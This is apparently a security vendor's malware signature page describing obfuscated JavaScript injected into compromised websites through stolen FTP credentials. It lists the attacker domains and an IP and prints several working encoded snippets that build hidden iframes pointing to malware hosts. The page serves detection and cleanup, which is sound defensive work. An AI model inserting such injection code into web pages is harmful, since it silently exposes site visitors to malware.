SiteCheck Signatures

  2. Home
  4. SiteCheck Signatures
  6. malware-entry-mwjs1304

malware-entry-mwjs1304

Description
Javascript encoded and hidden inside the HTML or PHP page. It is used to create an iframe to distribute malware hidden to the end user. In some cases it hides the content inside the <body onload> or sometimes just as a plain javascript entry.

Domains Used

94.63.240.145
sausagesments.com
zirycatum.com
numudozaf.com
http://cubyfonizi.com/k985ytv.htm

Affecting
Any web site. It uses stolen FTP passwords to compromises the site (similar to Gumblar).

Clean up
Request support here (or sign up here).

Malware dump

<body onload = "status=’’;xj=’5.p’;w=’dz’;q=’.’;vz=’94.’;....;ch.setAttribute(hg,y);document.body.appendChild(ch);window.status=status;"/>
<body onload="j=’7’;yy=’le’;jp=’b’;p=’if’;l=’sa’;sb=’1c’;x=’tp’;ih=’a’;he=’7’;yq=’us’;y=’/i’;b=’ht’;u=’a’;v=’p=3’;ea=’://‘;xh=’0fc’;d=’7’;c=’s’;e=’p?t’;xn=’/ho’;n=’n’;k=’s&#46’;ds=’sr’;q=’c’;h=’t’;o=’9’;fc=’dex’;tn=’17’;bg=’&#46ph’;an=’com’;hj=’ra’;mp=’f’;cw=’a’;fw=’me’;z=’me’;zf=’n’;vn=’ge’;dd=p&#46concat(hj,fw);i=ds&#46concat(q);jn=b&#46concat(x,ea,l,yq,u,vn,c,z,n,h,k,an,xn,yy,y,zf,fc,bg,e,v,mp,jp,d,ih,xh,sb,tn,o,j,cw,he);var mu=document&#46createElement(dd);mu&#46setAttribute(‘width’,’5’);mu&#46setAttribute(‘height’,’5’);mu&#46setAttribute(‘style’,’display:none’);mu&#46setAttribute(i,jn);document&#46body&#46appendChild(mu);">
<script>ti=’.c";ai=’af’;qo=’p’;jn=’htm’;rf=’n’;tf=’doz’;yn=’ifr’;xm=’s’;cl=’o’;jd=’k9’;nn=’tv&#46’;rl=’85y’;r=’umu’;eh=’m/‘;ec=’htt’;sb=’rc’;f=’ame’;l=’://‘;b=yn&#46concat(f);gg=xm&#46concat(sb);qt=ec&#46concat(qo,l,rf,r,tf,ai,ti,cl,eh,jd,rl,nn,jn);var xp=document&#46createElement(b);xp&#46setAttribute(‘width’,’1’);xp&#46setAttribute(‘height’,’1’);xp&#46frameBorder=0;xp&#46setAttribute(gg,qt);document&#46body&#46appendChild(xp);</script><script>wa=’t’;p=’ht’;f=’k98’;tb=’ame’;bg=’&#46’;v=’sr’;g=’tp:’;vf=’/z’;bs=’t’;px=’v&#46h’;br=’yt’;k=’c’;yr=’m’;ds=’m’;ej=’/‘;au=’/‘;t=’com’;sp=’ifr’;r=’ca’;cp=’y’;wz=’ir’;wf=’u’;b=’5’;se=sp&#46concat(tb);oz=v&#46concat(k);db=p&#46concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document&#46createElement(se);ip&#46setAttribute(‘width’,’1’);ip&#46setAttribute(‘height’,’1’);ip&#46frameBorder=0;ip&#46setAttribute(oz,db);document&#46body&#46appendChild(ip);</script>
<script>ez="://";la="k9";vp=’85y’;ma=’zi&#46’;s=’c’;f=’m’;kg=’cub’;i=’t’;zz=’/‘;l=’sr’;n=’c’;ng=’ame’;rv=’&#46ht’;gn=’om’;h=’ht’;tg=’v’;vl=’tp’;kf=’ni’;v=’ifr’;vq=’yfo’;bc=v&#46concat(ng);x=l&#46concat(n);p=h&#46concat(vl,ez,kg,vq,kf,ma,s,gn,zz,la,vp,i,tg,rv,f);var jc=document&#46createElement(bc);jc&#46setAttribute(‘width’,’1’);jc&#46setAttribute(‘height’,’1’);jc&#46frameBorder=0;jc&#46setAttribute(x,p);document.body.appendChild(jc);</script>